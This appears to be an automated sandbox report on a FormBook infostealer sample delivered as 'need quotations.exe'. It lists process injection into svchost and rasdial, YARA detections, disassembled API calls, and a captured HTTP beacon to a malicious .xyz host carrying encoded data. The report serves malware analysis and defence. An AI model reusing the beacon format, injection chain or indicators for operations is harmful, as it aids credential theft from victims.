xDq=YFTairCGIj7k/CsRc8fJnD+BabmEAq53IeCSss03jQRjB8B9uzLQXeu9jYJ2mJcFKEM3FiVU8xEWbh3YFMZlBdBoqNtEuNh0VLEylFgGuZf7U3YNMIohyWNtJ8OVuStorGRfugUsIdn70pYHmNod5bYkxBq2KavM46hYgRQHn/xIux6KVmFu+IaBBjEu2eEA+rJE761JXV2zi/MaJE6fIupeMVTAJGf60GB/LwvkRt8R+ldaPkpfik7E5GPhSTqaEBY8SNUzpMKvfczKQhtUoWH4KEEkquKt7seqlWH3wZ1WJT10ubTwxcovehPcS7/cRtCnc8DxCJa6oca9qvb3/NkeE1o3ba4LySdUWPq3CH0tf8Z45EO6K6b2JxXFxmPM1rvz8Ky4xXDj0NKTHQhn6FZS3XRK8zR1JmnPSG8iHOJ5kWYuFnGQyKDBKDgy9mwyuet6s7nSfKKU24LXMs3EgqXD5r7FdKh8a8QufQT+c6lpmMpK6zv38KQipkpC5JwEINh49B6IDNw/p4wBzstZwlb/T3yR6Xm8HRFkk+WPj6yZyur8pdsGNavvDaJ9JEHdgFaYQoKVp1zJyMpxEri6rVPmWQa5s+80H30GQQNT/i/j3vwsrIIq7Zs5YLCjhBRkj9CDMraJILpjNd1sYAPQEmofoXXr8S+q2ZmGJLBlnkURSCLWUm7DcuGbfZRraSUNn08mV/0f2Jgd6QhDZBgjssKhhR6DZq1JuR13tGVzJrU2X8vPXH3v9KmAXh50PuZ05H8WhxackQnUOjvpCA5L7PwcDGf95ZFpsn5MVwcGM0nmQvuagZUU5g3I2lt7qZg49ccpc3CUDUA/kq6EGto3zgWBi7mTDAouogArgP9dM7qYeZX9rw1LqMruKAdV2Mz6ZJuyCvyblcx0vD7lLOgqjsGwZ2frPdnybSfNNqUZwCd5PqnQx/cTQdUsQyPYYJ9PTQp8rXYDkVCoPC81TOS7sxRkR7YHFhIJ5/5MYdOeyxQ+j8tS [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	64879	85.159.66.93	80	5940	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 04:22:03.462068081 CET	469	OUT	GET /gqm1/?xDq=VH76hcmRMgeprQ8IT+3GxX+TS5+dQO04AZO3l+okmzs3WMxErCusHenX7YpJhZ4NLCcONUUw+VEfVDncTohff+sgqvxsooslXq9NnGhH6p7WeG8ES6Jz9FQ=&Lhx=fPAh7htHyFPl- HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.soainsaat.xyz User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Nov 20, 2024 04:22:04.160178900 CET	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Wed, 20 Nov 2024 03:22:04 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-11-20T03:22:09.0450577Z

Target ID:	0
Start time:	22:17:57
Start date:	19/11/2024
Path:	C:\Users\user\Desktop\need quotations.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\need quotations.exe"
Imagebase:	0x240000
File size:	1'214'976 bytes
MD5 hash:	2B4391106CB993AD3FA94FFF2D39C70C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	22:17:58
Start date:	19/11/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\need quotations.exe"
Imagebase:	0xd00000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1982709060.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1982943368.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1983616286.0000000003950000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	22:18:21
Start date:	19/11/2024
Path:	C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe"
Imagebase:	0xc10000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4145847136.0000000006A40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4142229075.0000000002950000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	22:18:22
Start date:	19/11/2024
Path:	C:\Windows\SysWOW64\rasdial.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\rasdial.exe"
Imagebase:	0x90000
File size:	19'456 bytes
MD5 hash:	A280B0F42A83064C41CFFDC1CD35136E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4142028944.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4141916855.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4140969114.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	22:18:47
Start date:	19/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.8%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	8%
Total number of Nodes:	2000
Total number of Limit Nodes:	63

Executed Functions

Function 0026B043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b342fe743d46170cf37ea6124a751452e644d1d58f893d09ad2eb3c639909f22
Instruction ID: d90d99445fb1acd1a2a2560cc64d39d4c7b02c062cccc3edd8c451f8f0d41f99
Opcode Fuzzy Hash: b342fe743d46170cf37ea6124a751452e644d1d58f893d09ad2eb3c639909f22
Instruction Fuzzy Hash: 5F326D75B222298FCB268F14DC95AE9B7B5FB46310F1840D9E40AE7A91D7309ED0CF52

Function 00243D19 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00243AA3,?), ref: 00243D45
IsDebuggerPresent.KERNEL32(?,?,?,?,00243AA3,?), ref: 00243D57
GetFullPathNameW.KERNEL32(00007FFF,?,?,00301148,00301130,?,?,?,?,00243AA3,?), ref: 00243DC8

Part of subcall function 00246430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00243DEE,00301148,?,?,?,?,?,00243AA3,?), ref: 00246471

SetCurrentDirectoryW.KERNEL32(?,?,?,00243AA3,?), ref: 00243E48
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,002F28F4,00000010), ref: 002B1CCE
SetCurrentDirectoryW.KERNEL32(?,00301148,?,?,?,?,?,00243AA3,?), ref: 002B1D06
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,002DDAB4,00301148,?,?,?,?,?,00243AA3,?), ref: 002B1D89
ShellExecuteW.SHELL32(00000000,?,?,?,?,00243AA3), ref: 002B1D90

Part of subcall function 00243E6E: GetSysColorBrush.USER32(0000000F), ref: 00243E79
Part of subcall function 00243E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00243E88
Part of subcall function 00243E6E: LoadIconW.USER32(00000063), ref: 00243E9E
Part of subcall function 00243E6E: LoadIconW.USER32(000000A4), ref: 00243EB0
Part of subcall function 00243E6E: LoadIconW.USER32(000000A2), ref: 00243EC2
Part of subcall function 00243E6E: RegisterClassExW.USER32(?), ref: 00243F30

Part of subcall function 002436B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002436E6
Part of subcall function 002436B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00243707
Part of subcall function 002436B8: ShowWindow.USER32(00000000,?,?,?,?,00243AA3,?), ref: 0024371B
Part of subcall function 002436B8: ShowWindow.USER32(00000000,?,?,?,?,00243AA3,?), ref: 00243724

Part of subcall function 00244FFC: _memset.LIBCMT ref: 00245022
Part of subcall function 00244FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 002450CB

Strings

()/, xrefs: 002B1D49
runas, xrefs: 002B1D84
This is a third-party compiled AutoIt script., xrefs: 002B1CC8

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
String ID: ()/$This is a third-party compiled AutoIt script.$runas
API String ID: 438480954-2193626289
Opcode ID: bc0be4af191cda6e6ae493eb72483f6aa32b5c9e9f8197abc66ff0393f7e7c25
Instruction ID: 81a1df8317b7d6eefd775e04170dc8f277d0461232b0291faeaf7ee4f8934477
Opcode Fuzzy Hash: bc0be4af191cda6e6ae493eb72483f6aa32b5c9e9f8197abc66ff0393f7e7c25
Instruction Fuzzy Hash: 39512B30A26249ABCF1EEFB0DC65EEE7B799F19744F004066F64163192DAB04679CF21

Function 0025DDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0025DDEC
GetCurrentProcess.KERNEL32(00000000,002DDC38,?,?), ref: 0025DEAC
GetNativeSystemInfo.KERNELBASE(?,002DDC38,?,?), ref: 0025DF01
FreeLibrary.KERNEL32(00000000,?,?), ref: 0025DF0C
FreeLibrary.KERNEL32(00000000,?,?), ref: 0025DF1F
GetSystemInfo.KERNEL32(?,002DDC38,?,?), ref: 0025DF29
GetSystemInfo.KERNEL32(?,002DDC38,?,?), ref: 0025DF35

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
String ID:
API String ID: 3851250370-0
Opcode ID: 73a081b3200e47268f404a3e3c1f983e2e83030a6fdec8dfb14f12da53834315
Instruction ID: 18881a516eb3af148fc95dfe16df262a33c1bf824b664924da1925a542b52236
Opcode Fuzzy Hash: 73a081b3200e47268f404a3e3c1f983e2e83030a6fdec8dfb14f12da53834315
Instruction Fuzzy Hash: C961B0B182A384CBCF25CF6898C15E97FB4AF29301B1949D9DC459F207C674C91DCB69

Function 0024406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0024449E,?,?,00000000,00000001), ref: 0024407B
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0024449E,?,?,00000000,00000001), ref: 00244092
LoadResource.KERNEL32(?,00000000,?,?,0024449E,?,?,00000000,00000001,?,?,?,?,?,?,002441FB), ref: 002B4F1A
SizeofResource.KERNEL32(?,00000000,?,?,0024449E,?,?,00000000,00000001,?,?,?,?,?,?,002441FB), ref: 002B4F2F
LockResource.KERNEL32(0024449E,?,?,0024449E,?,?,00000000,00000001,?,?,?,?,?,?,002441FB,00000000), ref: 002B4F42

Strings

SCRIPT, xrefs: 00244088

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 06933d3a0c82f6da4523c5e784c5980a52c5977e6ef2c0227a27daf05253fbf1
Instruction ID: 0dfe5d2ee798b9b1b0215f3b519302ca59c49971415655da6bf9f3cf7e878225
Opcode Fuzzy Hash: 06933d3a0c82f6da4523c5e784c5980a52c5977e6ef2c0227a27daf05253fbf1
Instruction Fuzzy Hash: 87117C70210701BFE7299B66EC48F27BBB9EBC5B61F10412DF602962A0DB71DC10CA21

Function 00253B70 Relevance: 5.9, Strings: 4, Instructions: 903COMMON

Download Yara Rule

Strings

0, xrefs: 002540A4
0, xrefs: 002B701F
@, xrefs: 00254176
0, xrefs: 002540EC

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: @$ 0$ 0$ 0
API String ID: 3728558374-1819487181
Opcode ID: 26a29bd832321ba880714083725f35e7e463330a432838169e9a80d4b4901fab
Instruction ID: 83cf89dc3fc33617fd58e3fbdb71bfc697ed25d78a24550ac2d6c660a8180cae
Opcode Fuzzy Hash: 26a29bd832321ba880714083725f35e7e463330a432838169e9a80d4b4901fab
Instruction Fuzzy Hash: 1072CF34E242099FCF14EF94C481ABEB7B5EF48341F14805AED09AB291D770AE69CF95

Function 00286CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,002B2F49), ref: 00286CB9
FindFirstFileW.KERNELBASE(?,?), ref: 00286CCA
FindClose.KERNEL32(00000000), ref: 00286CDA

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 09d7db2ae7cbef50c3bf16c9653947ad3e477010accfb89e4d9e8c88fc89543d
Instruction ID: 369527e359bbc27ea86ac147eac2228ef2848b548dd25cd4ca877e0fdd7e1017
Opcode Fuzzy Hash: 09d7db2ae7cbef50c3bf16c9653947ad3e477010accfb89e4d9e8c88fc89543d
Instruction Fuzzy Hash: 17E0D8358214115B83107778FC0D8E9376CDA05339F100716F475C11D0E7F0D91046D5

Function 00253200 Relevance: 2.2, Strings: 1, Instructions: 986COMMON

Download Yara Rule

Strings

0, xrefs: 002B933E

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: BuffCharUpper
String ID: 0
API String ID: 3964851224-1466728594
Opcode ID: 0e2515e4069aed0cceb34f46a2b03d80320c001bee77f4168715f04b50595cdd
Instruction ID: b9232cf01201c06f356ffde45fece71864937b3ec802cc92462703270182926d
Opcode Fuzzy Hash: 0e2515e4069aed0cceb34f46a2b03d80320c001bee77f4168715f04b50595cdd
Instruction Fuzzy Hash: 4C92AC70628301DFD724DF18C484B6AB7E1BF88344F14885DE98A8B392D771EDA9CB56

Function 0024E8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0024E959
timeGetTime.WINMM ref: 0024EBFA
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0024ED2E
TranslateMessage.USER32(?), ref: 0024ED3F
DispatchMessageW.USER32(?), ref: 0024ED4A
LockWindowUpdate.USER32(00000000), ref: 0024ED79
DestroyWindow.USER32 ref: 0024ED85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0024ED9F
Sleep.KERNEL32(0000000A), ref: 002B5270
TranslateMessage.USER32(?), ref: 002B59F7
DispatchMessageW.USER32(?), ref: 002B5A05
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002B5A19

Strings

@GUI_CTRLID, xrefs: 002B5314
@GUI_WINHANDLE, xrefs: 002B5360
@GUI_CTRLHANDLE, xrefs: 002B53AC
@TRAY_ID, xrefs: 002B54C9

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 2641332412-570651680
Opcode ID: 0745ac364947503c30964b650d02a66aa25f01bd776082cb159876c6d12e4eb1
Instruction ID: 1bb4f84258237efa0ade30adcfb18ba3833f4e178abd3ef9bde9fe511eb19309
Opcode Fuzzy Hash: 0745ac364947503c30964b650d02a66aa25f01bd776082cb159876c6d12e4eb1
Instruction Fuzzy Hash: 7262E270524341DFEB29DF24C885BAA77E4BF44304F15496EF98A8B292DBB0D858CF52

Function 00275C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

___createFile.LIBCMT ref: 00275EC3
___createFile.LIBCMT ref: 00275F04
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00275F2D
__dosmaperr.LIBCMT ref: 00275F34
GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00275F47
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00275F6A
__dosmaperr.LIBCMT ref: 00275F73
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00275F7C
__set_osfhnd.LIBCMT ref: 00275FAC
__lseeki64_nolock.LIBCMT ref: 00276016
__close_nolock.LIBCMT ref: 0027603C
__chsize_nolock.LIBCMT ref: 0027606C
__lseeki64_nolock.LIBCMT ref: 0027607E
__lseeki64_nolock.LIBCMT ref: 00276176
__lseeki64_nolock.LIBCMT ref: 0027618B
__close_nolock.LIBCMT ref: 002761EB

Part of subcall function 0026EA9C: CloseHandle.KERNELBASE(00000000,002EEEF4,00000000,?,00276041,002EEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0026EAEC
Part of subcall function 0026EA9C: GetLastError.KERNEL32(?,00276041,002EEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0026EAF6
Part of subcall function 0026EA9C: __free_osfhnd.LIBCMT ref: 0026EB03
Part of subcall function 0026EA9C: __dosmaperr.LIBCMT ref: 0026EB25

Part of subcall function 00267C0E: __getptd_noexit.LIBCMT ref: 00267C0E

__lseeki64_nolock.LIBCMT ref: 0027620D
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00276342
___createFile.LIBCMT ref: 00276361
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0027636E
__dosmaperr.LIBCMT ref: 00276375
__free_osfhnd.LIBCMT ref: 00276395
__invoke_watson.LIBCMT ref: 002763C3
__wsopen_helper.LIBCMT ref: 002763DD

Strings

@, xrefs: 00275F98

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
String ID: @
API String ID: 3896587723-2766056989
Opcode ID: 9b99bb437043dfb491c509c7ed7f03c44d791bd5a48c1ec24876d7aceccb711d
Instruction ID: 97038ae051aa307eb262524acee45f867080d93a36cb9161280ba9ae650f15db
Opcode Fuzzy Hash: 9b99bb437043dfb491c509c7ed7f03c44d791bd5a48c1ec24876d7aceccb711d
Instruction Fuzzy Hash: 5E225971920A179FEF259F68DC49BBDBB61EB00314F24C229E919972D2C3B58D70CB91

Function 0028FA0C Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcscpy.LIBCMT ref: 0028FA96
_wcschr.LIBCMT ref: 0028FAA4
_wcscpy.LIBCMT ref: 0028FABB
_wcscat.LIBCMT ref: 0028FACA
_wcscat.LIBCMT ref: 0028FAE8
_wcscpy.LIBCMT ref: 0028FB09
__wsplitpath.LIBCMT ref: 0028FBE6
_wcscpy.LIBCMT ref: 0028FC0B
_wcscpy.LIBCMT ref: 0028FC1D
_wcscpy.LIBCMT ref: 0028FC32
_wcscat.LIBCMT ref: 0028FC47
_wcscat.LIBCMT ref: 0028FC59
_wcscat.LIBCMT ref: 0028FC6E

Part of subcall function 0028BFA4: _wcscmp.LIBCMT ref: 0028C03E
Part of subcall function 0028BFA4: __wsplitpath.LIBCMT ref: 0028C083
Part of subcall function 0028BFA4: _wcscpy.LIBCMT ref: 0028C096
Part of subcall function 0028BFA4: _wcscat.LIBCMT ref: 0028C0A9
Part of subcall function 0028BFA4: __wsplitpath.LIBCMT ref: 0028C0CE
Part of subcall function 0028BFA4: _wcscat.LIBCMT ref: 0028C0E4
Part of subcall function 0028BFA4: _wcscat.LIBCMT ref: 0028C0F7

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 0028FA61
t2/, xrefs: 0028FC97

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
String ID: >>>AUTOIT SCRIPT<<<$t2/
API String ID: 2955681530-666463152
Opcode ID: 25c2bc6a0885ce71202865173a07f10289efbdffa2cb1821cd9f1c9a784fbf05
Instruction ID: d6ba49de401171184a455be0b3cee5694366665862f511d1f2c30e2de03b1cd2
Opcode Fuzzy Hash: 25c2bc6a0885ce71202865173a07f10289efbdffa2cb1821cd9f1c9a784fbf05
Instruction Fuzzy Hash: 8291B2755243059FCB24FF50C991E9BB3E8BF88710F004969F98997291DB30EAA4CF92

Function 00243F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

